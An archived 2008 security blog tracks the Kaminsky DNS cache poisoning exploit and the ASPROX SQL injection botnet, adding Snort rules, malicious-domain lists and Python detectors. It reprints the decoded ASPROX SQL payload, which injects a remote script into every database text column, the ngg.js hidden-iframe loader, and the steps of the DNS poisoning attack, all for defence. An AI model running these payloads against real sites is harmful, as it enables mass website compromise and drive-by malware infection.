Monday, July 28, 2008
On the tail of the huge DNS flaw, the Argentinian group InfoByte Security Research has released a shocking new tool that exploits insecure application updates through man-in-the-middle attacks, including Kaminsky's DNS cache poisoning.
Essentially, "Evilgrade" is both an attack toolkit and a mock update server framework that redirects an application's update service to the host running Evilgrade. If successful, full system compromise is possible, giving the attacker a passive way to amass a botnet.
Evilgrade supports exploiting the update services of the following popular programs:
Java, Winzip, Winamp, Mac OS X, OpenOffice, iTunes, Linkedin Toolbar
So what is the upside to such a scary tool? It will likely force developers to create a new, secure process for pushing updates, probably moving to some sort of PKI architecture.
Thursday, July 24, 2008
Kaminsky DNS Cache Poisoning PoC Exploit in Metasploit SVN
Looks like Druid and HDM have released a proof-of-concept exploit in Metasploit to attack nameservers using Kaminsky's now-leaked vulnerability. This is huge because not only is the attack unbelievably easy to execute, 95% of the Internet is still vulnerable!
This is a historical moment in IT Security and will be a very, very busy day for those of us on the defense side.
Exploit Code:
http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
http://www.caughq.org/exploits/CAU-EX-2008-0003.txt
Or simply grab the latest metasploit:
svn co http://metasploit.com/svn/framework3/trunk/
Snort signatures I wrote for Emerging Threats:
alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible NS RR Cache Poisoning Attempt"; content: "|85 00 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src, count 50, seconds 2; classtype:bad-unknown; reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008447; rev:10;)
alert udp any 53 -> $HOME_NET any (msg:"ET CURRENT_EVENTS DNS Query Responses with 3 RR's set (50+ in 2 seconds) - possible A RR Cache Poisoning Attempt"; content: "|81 80 00 01 00 01 00 01|"; offset: 2; within: 8; threshold: type both, track by_src, count 50, seconds 2; classtype:bad-unknown; reference:url,infosec20.blogspot.com/2008/07/kaminsky-dns-cache-poisoning-poc.html; sid:2008457; rev:10;)
*** Update ***
A new Metasploit module is out this morning which allows you to poison the cache with the NS record for an entire domain. This means that if you have an evil NS server to take the requests, you can mass-own entire domains such as google, microsoft, etc. Scary stuff.
http://blog.wired.com/27bstroke6/2008/07/dns-exploit-in.html
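The two Snort rules above encode a simple idea: a burst of DNS responses from one source whose header carries exactly one question, one answer and one authority record looks like someone spraying forged replies at a resolver. The following stand-alone detector is an added example, not code from the original post or from Emerging Threats; it re-implements the rules' logic (header bytes 2-9 compared against the rule's hex content, then a by_src threshold of 50 hits in 2 seconds with one alert per interval) so the matching can be studied on constructed packets. The source IPs, timestamps and packet bodies are constructed sample data.

```python
"""Stand-alone re-implementation of the two Snort rules above.

Added example, not code from the original post or from Emerging Threats.  It
applies the same two tests the rules express: DNS header bytes 2-9 equal to
the rule's hex content (flags, QDCOUNT=1, ANCOUNT=1, NSCOUNT=1), then a
by_src threshold of 50 matching responses within 2 seconds, alerting once
per interval ("type both").  Packets, source IPs and timestamps are
constructed sample data.
"""
import struct
from collections import defaultdict, deque
from typing import Iterable, List, Optional, Tuple

# 0x8500: response + authoritative answer (forged NS data);
# 0x8180: response + recursion desired/available (forged A data).
NS_RR_PATTERN = bytes.fromhex("8500000100010001")
A_RR_PATTERN = bytes.fromhex("8180000100010001")
THRESHOLD_COUNT = 50      # count 50
THRESHOLD_SECONDS = 2.0   # seconds 2


def matches_rule(dns_payload: bytes) -> Optional[str]:
    """Return the rule message matched by header bytes 2..9, or None."""
    if len(dns_payload) < 12:
        return None
    window = dns_payload[2:10]          # offset 2, eight bytes
    if window == NS_RR_PATTERN:
        return "possible NS RR Cache Poisoning Attempt"
    if window == A_RR_PATTERN:
        return "possible A RR Cache Poisoning Attempt"
    return None


class ThresholdTracker:
    """threshold: type both, track by_src: alert on the 50th hit within 2 s,
    then stay quiet for that source until the interval has passed."""

    def __init__(self, count: int = THRESHOLD_COUNT, seconds: float = THRESHOLD_SECONDS):
        self.count, self.seconds = count, seconds
        self.hits = defaultdict(deque)   # src -> timestamps inside the window
        self.alerted_at = {}             # src -> time of the last alert

    def observe(self, src: str, ts: float) -> bool:
        last = self.alerted_at.get(src)
        if last is not None and ts - last < self.seconds:
            return False                 # suppressed: one alert per interval
        q = self.hits[src]
        q.append(ts)
        while q and ts - q[0] > self.seconds:
            q.popleft()                  # slide the window forward
        if len(q) >= self.count:
            self.alerted_at[src] = ts
            q.clear()
            return True
        return False


def build_response(flags: int, qd=1, an=1, ns=1, ar=0, txid=0x1234) -> bytes:
    """Constructed DNS message: a 12-byte header followed by a dummy body."""
    return struct.pack("!HHHHHH", txid, flags, qd, an, ns, ar) + b"\x00" * 20


def scan(packets: Iterable[Tuple[float, str, bytes]]) -> List[Tuple[float, str, str]]:
    """packets: (timestamp, source IP, UDP payload from port 53) -> alerts."""
    tracker = ThresholdTracker()
    alerts = []
    for ts, src, payload in packets:
        rule = matches_rule(payload)
        if rule and tracker.observe(src, ts):
            alerts.append((ts, src, rule))
    return alerts


def sample_traffic() -> List[Tuple[float, str, bytes]]:
    """Constructed sample: 60 forged-looking NS responses from one source in
    0.6 s, plus five ordinary two-answer responses from another source."""
    burst = [(100.0 + i * 0.01, "192.0.2.10", build_response(0x8500))
             for i in range(60)]
    normal = [(100.0 + i * 0.3, "198.51.100.7", build_response(0x8180, an=2, ns=0))
              for i in range(5)]
    return sorted(burst + normal, key=lambda p: p[0])


if __name__ == "__main__":
    for ts, src, rule in scan(sample_traffic()):
        print(f"{ts:.2f} {src}: {rule}")
```

Running it prints a single alert for 192.0.2.10 on its 50th response; the ordinary responses never match because their ANCOUNT/NSCOUNT differ. Like the rules themselves, this is a rate heuristic: a busy authoritative server legitimately answering a resolver can cross 50 responses in 2 seconds, so the count should be tuned per environment.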
Labels:
Dan Kaminsky,
DNS Cache Poisoning,
DNS Flaw,
Metasploit,
Snort
Tuesday, July 22, 2008
Major DNS Flaw revealed
The security blogosphere is exploding with chatter today about leaked details of Dan Kaminsky's multi-vendor DNS flaw.
Here is how it works (according to the leak):
Malory wants to poison the server ns.polya.com.
Malory sends NS requests for ulam00001.com, ulam00002.com, … to ns.polya.com.
Malory then sends forged answers saying that the NS for http://www.ulam00002.com is ns.google.com *AND* includes a glue record saying that ns.google.com is 66.6.6.6.
Because the glue record corresponds with the answer record (same domain), the targeted nameserver will cache it, replacing its current record for ns.google.com with 66.6.6.6.
http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html
Make sure to read the comments for details of the original leak (Matasano's blog). The drama: Matasano originally called BS on the flaw, forcing Dan to back it up with a phone briefing. Thomas Ptacek then retracted his BS claims under the agreement that he would keep quiet. Now the same guy who leaked the technical details is attempting to apologize... What a jerk.
http://www.matasano.com/log/1105/regarding-the-post-on-chargen-earlier-today/
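The step that makes the leaked technique work is the resolver accepting a glue record for ns.google.com from a response about ulam00002.com. The check that stops it is the bailiwick rule: additional-section data is only cacheable when its owner name lies inside the zone the response is about. The code below is an added example, not from the original post or from any resolver's source; it builds the response described above (answer: NS for ulam00002.com is ns.google.com; glue: ns.google.com A 66.6.6.6) as constructed bytes, parses it, and applies the rule. Taking the queried name's zone as the bailiwick is a simplification of what real resolvers track.

```python
"""Resolver-side bailiwick check for the forged response described above.

Added example, not code from the original post or from any resolver.  The
forged and legitimate responses are constructed sample data; the bailiwick
is simplified to the queried name's zone.
"""
import struct
from typing import List, Tuple

TYPE_A, TYPE_NS = 1, 2


def encode_name(name: str) -> bytes:
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg: bytes, pos: int) -> Tuple[str, int]:
    """Decode a (possibly compressed) name; return (name, position after it)."""
    labels, jumped, end = [], False, pos
    while True:
        length = msg[pos]
        if length & 0xC0 == 0xC0:            # compression pointer
            if not jumped:
                end = pos + 2
            pos = struct.unpack("!H", msg[pos:pos + 2])[0] & 0x3FFF
            jumped = True
            continue
        pos += 1
        if length == 0:
            break
        labels.append(msg[pos:pos + length].decode("ascii"))
        pos += length
    if not jumped:
        end = pos
    return ".".join(labels), end


def rr(name: str, rtype: int, rdata: bytes, ttl: int = 3600) -> bytes:
    """Resource record: NAME TYPE CLASS(IN) TTL RDLENGTH RDATA."""
    return encode_name(name) + struct.pack("!HHIH", rtype, 1, ttl, len(rdata)) + rdata


def response(qname: str, ns_name: str, glue_name: str, glue_ip: bytes) -> bytes:
    """Constructed response: one NS answer plus one A record in the additional section."""
    header = struct.pack("!HHHHHH", 0x1234, 0x8500, 1, 1, 0, 1)
    question = encode_name(qname) + struct.pack("!HH", TYPE_NS, 1)
    return (header + question
            + rr(qname, TYPE_NS, encode_name(ns_name))
            + rr(glue_name, TYPE_A, glue_ip))


def forged_response() -> bytes:
    """The poisoning response from the leaked description (constructed bytes)."""
    return response("ulam00002.com", "ns.google.com", "ns.google.com", bytes([66, 6, 6, 6]))


def legitimate_response() -> bytes:
    """Normal delegation: glue for a nameserver inside the queried zone."""
    return response("ulam00002.com", "ns1.ulam00002.com", "ns1.ulam00002.com", bytes([192, 0, 2, 53]))


def parse_records(msg: bytes):
    """Return (qname, answers, additionals); records are (owner, type, rdata)."""
    _, _, qd, an, ns, ar = struct.unpack("!HHHHHH", msg[:12])
    qname, pos = decode_name(msg, 12)
    pos += 4                                  # QTYPE, QCLASS
    sections: List[list] = []
    for count in (an, ns, ar):
        recs = []
        for _ in range(count):
            owner, pos = decode_name(msg, pos)
            rtype, _, _, rdlen = struct.unpack("!HHIH", msg[pos:pos + 10])
            pos += 10
            rdata_start, pos = pos, pos + rdlen
            if rtype == TYPE_A:
                rdata = ".".join(str(b) for b in msg[rdata_start:pos])
            elif rtype == TYPE_NS:
                rdata = decode_name(msg, rdata_start)[0]
            else:
                rdata = msg[rdata_start:pos]
            recs.append((owner, rtype, rdata))
        sections.append(recs)
    return qname, sections[0], sections[2]


def in_bailiwick(owner: str, zone: str) -> bool:
    owner, zone = owner.lower().rstrip("."), zone.lower().rstrip(".")
    return owner == zone or owner.endswith("." + zone)


def cacheable_records(msg: bytes):
    """Keep answers; keep additional records only when they are in-bailiwick."""
    qname, answers, additionals = parse_records(msg)
    accepted, rejected = list(answers), []
    for rec in additionals:
        (accepted if in_bailiwick(rec[0], qname) else rejected).append(rec)
    return accepted, rejected
```

For the forged message the NS answer is kept but the ns.google.com glue is rejected, so nothing about google.com ever enters the cache from a ulam00002.com lookup; the legitimate delegation keeps its glue. The bailiwick check was already standard in 2008; what made the attack practical was the ability to retry against an unlimited supply of fresh names, which is why the vendor fix added source-port randomization rather than changing this rule.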
Updated ASPROX Toolkit
We have a new toolkit available with the following important additions:
T-SQL code for cleaning infected databases.
URLScan configuration instructions for catching injection attempts.
click here to grab the new toolkit
Thursday, July 10, 2008
ASPROX Botnet up to 16,500 Zombies
Just a quick update: ASPROX is currently around 16,500 zombies, up from 12k last week.
Get the updated IP list of the infected zombie hosts
And make sure to grab our ASPROX information toolkit
Monday, July 7, 2008
ASPROX Payload Morphed NGG.JS
New domains have been found, and a new JavaScript payload, "ngg.js", has replaced the previous "b.js".
And it doesn't seem to be wasting any time:
http://www.google.com/search?q=ngg.js
Results 1 - 10 of about 19,300 for ngg.js. (0.03 seconds)
New SQL Injection Payload (HEX DECODED):
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name,b.name FROM sysobjects a,syscolumns b
  WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
  EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''script src=http://www.apidad.com/ngg.js /script''')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
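The payload above arrived hex-encoded inside a CAST(0x... AS VARCHAR) in the query string, which is why the post shows it "HEX DECODED" and why a URLScan rule can catch the request before it reaches SQL Server. The script below is an added example, not code from the original post or from the Sentinel IPS toolkit: it walks web-server log lines, URL-decodes each query string, decodes every hex CAST it finds (VARCHAR as single-byte text, NVARCHAR as UTF-16LE) and flags requests whose decoded SQL carries the markers of the cursor payload. The W3C-style log lines, client IPs and hex blobs are constructed sample data, and the decoded SQL is a shortened stand-in for the payload shown above.

```python
"""Decoder and detector for the hex-encoded ASPROX injection requests.

Added example, not code from the original post or from the Sentinel IPS
toolkit.  The log lines, client IPs and hex blobs are constructed sample
data; STAND_IN_SQL is a shortened stand-in for the decoded payload above.
"""
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# CAST(0x<hex> AS VARCHAR(n)) or NVARCHAR, as carried in the query string
HEX_CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR)\s*\(\s*\d+\s*\)\s*\)",
    re.IGNORECASE,
)
# Pieces of the decoded payload that identify the attack
MARKERS = ("DECLARE", "CURSOR", "sysobjects", "syscolumns", "EXEC(", "script src")
SCRIPT_SRC_RE = re.compile(r"script\s+src=(\S+)", re.IGNORECASE)


def decode_hex_literal(hex_digits: str, cast_type: str) -> str:
    """NVARCHAR blobs are UTF-16LE; VARCHAR blobs are single-byte text."""
    raw = bytes.fromhex(hex_digits)
    if cast_type.upper() == "NVARCHAR":
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def analyze_query(query_string: str) -> Dict:
    """URL-decode a query string, decode every hex CAST in it and score it."""
    decoded_qs = unquote_plus(query_string)
    payloads = [decode_hex_literal(h, t) for h, t in HEX_CAST_RE.findall(decoded_qs)]
    text = " ".join(payloads)
    markers = [m for m in MARKERS if m.lower() in text.lower()]
    return {
        "decoded": payloads,
        "markers": markers,
        "script_sources": SCRIPT_SRC_RE.findall(text),
        "suspicious": len(markers) >= 2,
    }


def scan_log(lines: List[str]) -> List[Dict]:
    """Walk W3C-style log lines, locating columns via the #Fields header."""
    idx: Dict[str, int] = {}
    findings = []
    for line in lines:
        if line.startswith("#Fields:"):
            idx = {name: i for i, name in enumerate(line.split()[1:])}
            continue
        if line.startswith("#") or not line.strip() or not idx:
            continue
        fields = line.split()
        result = analyze_query(fields[idx["cs-uri-query"]])
        if result["suspicious"]:
            result["client_ip"] = fields[idx["c-ip"]]
            result["uri_stem"] = fields[idx["cs-uri-stem"]]
            findings.append(result)
    return findings


# Constructed, shortened stand-in for the decoded cursor payload above
STAND_IN_SQL = ("DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR "
                "SELECT a.name,b.name FROM sysobjects a,syscolumns b ... "
                "EXEC('UPDATE ... script src=http://www.apidad.com/ngg.js /script')")
VARCHAR_HEX = STAND_IN_SQL.encode("latin-1").hex().upper()
NVARCHAR_HEX = STAND_IN_SQL.encode("utf-16-le").hex().upper()

# Constructed log sample: one clean request, two injection attempts, one benign search
SAMPLE_LOG = [
    "#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip",
    "2008-07-07 14:02:11 10.0.0.5 GET /products.asp id=12 80 - 203.0.113.17",
    "2008-07-07 14:02:19 10.0.0.5 GET /products.asp "
    f"id=12;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x{VARCHAR_HEX}%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 192.0.2.44",
    "2008-07-07 14:03:02 10.0.0.5 GET /news.asp "
    f"id=7;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x{NVARCHAR_HEX}%20AS%20NVARCHAR(4000));EXEC(@S);-- 80 - 198.51.100.9",
    "2008-07-07 14:03:40 10.0.0.5 GET /search.asp q=ngg.js+download 80 - 203.0.113.17",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["client_ip"], f["uri_stem"], f["markers"], f["script_sources"])
```

Both injection attempts are reported with the injected script URL extracted from the decoded SQL, while the search for "ngg.js" is not flagged, since matching on the filename alone would be noisy. Decoding the hex rather than pattern-matching the raw request is what keeps the detection working when the attacker varies the encoding, which is the same reason the blocklist of domains above keeps growing.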
What's in ngg.js? The familiar iframe attack from before, but this time it selectively ignores browsers from Russia, Ukraine, China, Korea, Vietnam and India. Lovely :)
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="UR")&&(n!="VI")){
  var cookieString = document.cookie;
  var start = cookieString.indexOf("updngg=");
  if (start != -1){}else{
    var expires = new Date();
    expires.setTime(expires.getTime()+11*3600*1000);
    document.cookie = "updngg=update;expires="+expires.toGMTString();
    try{
      document.write("iframe src=http://mainbvd.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0>/iframe");
    }
    catch(e)
    {
    };
  }
}
New ASPROX domains spotted:
apidad.com, mainbvd.com, bnrbtch.com, ucomddv.com, brsadd.com, asodbr.com, canclvr.com, portwbr.com, catdbw.mobi, allocbn.mobi, testwvr.com, stiwdd.com, adwadb.mobi, dbgbron.com, ktrcom.com, hiwowpp.cn, clrbbd.com, browsad.com, blockkd.com, bnradd.mobi, bnrbase.com, adbtch.com, aladbnr.com, aladbnr.com, loctenv.com, bnrbasead.com, appdad.com, blcadw.com, destbnp.com, attadd.com, nopcls.com, ausbnr.com, bkpadd.mobi, tctcow.com, ausadd.com, movaddw.com, cliprts.com
Snort signature to detect access of infected site:
alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX Infected Site - ngg.js Request"; flow:established,to_server; uricontent:"/ngg.js"; classtype:trojan-activity; reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)
And finally go here to download Sentinel IPS' ASPROX Information Toolkit
Labels:
ASPROX,
Botnet,
Malware,
Phishing,
SQL Injection
Thursday, July 3, 2008
ASPROX Botnet Fingerprinted: 11,816 Zombies
Today at 2pm CST I launched a massive query across our widespread network of Sentinel IPS appliances, pulling the unique source IPs from the ASPROX SQL injection attacks.
Now we have an idea of size, location of zombies and a giant block list which we have made available right here
**Update** This is a list of the infected machines the SQL injection attacks are emanating from, not the number of compromised ASP websites, which is much higher, nearing 100,000.
Was fun to whip up this geo-map of ASPROX's zombies...
Wednesday, July 2, 2008
New ASPROX / SQL Injection Defense Tools
ASPROX is not letting up; many of our clients are still seeing SQL injection attacks blocked every 3-5 minutes on their Sentinel.
Microsoft released a tool for scanning your ASP and ASPX code and identifying SQL injection vulnerabilities. I highly recommend giving it a try: kb-954476
Also HP released a free version of their web security auditing tool specifically to check for SQL Injection, it's called Scrawler and you can get it here
More ASPROX domains (they don't give up, do they?):
tid62.com, kadport.com, suppadw.com, supbnr.com, adwsupp.com, bnrupdate.mobi, adwste.mobi, adupd.mobi, hlpgetw.com, hdadwcd.com, rid34.com, adupd.mobi, adwste.mobi, bnrupdate.mobi, cntrl62.com, config73.com, cont67.com, csl24.com, debug73.com, default37.com, get49.net, pid72.com, pid76.net, web923.com, base48.com, asp63.com, form43.com, maigol.cn
And finally, we are still emailing our ASPROX Toolkit document, which gives information on the attack and how to recover from it if your organization has been compromised.
Tuesday, July 1, 2008
Iframes and IE, vewwy vewwy bad...
Responses poured in from my last post from readers wanting to know how malware can be loaded simply by including an iframe (sourcing HTML from another site).
Well, in case you too are wondering, MS never intended it to be that way....
See http://www.kb.cert.org/vuls/id/516627
New ASPROX domains: dl251.com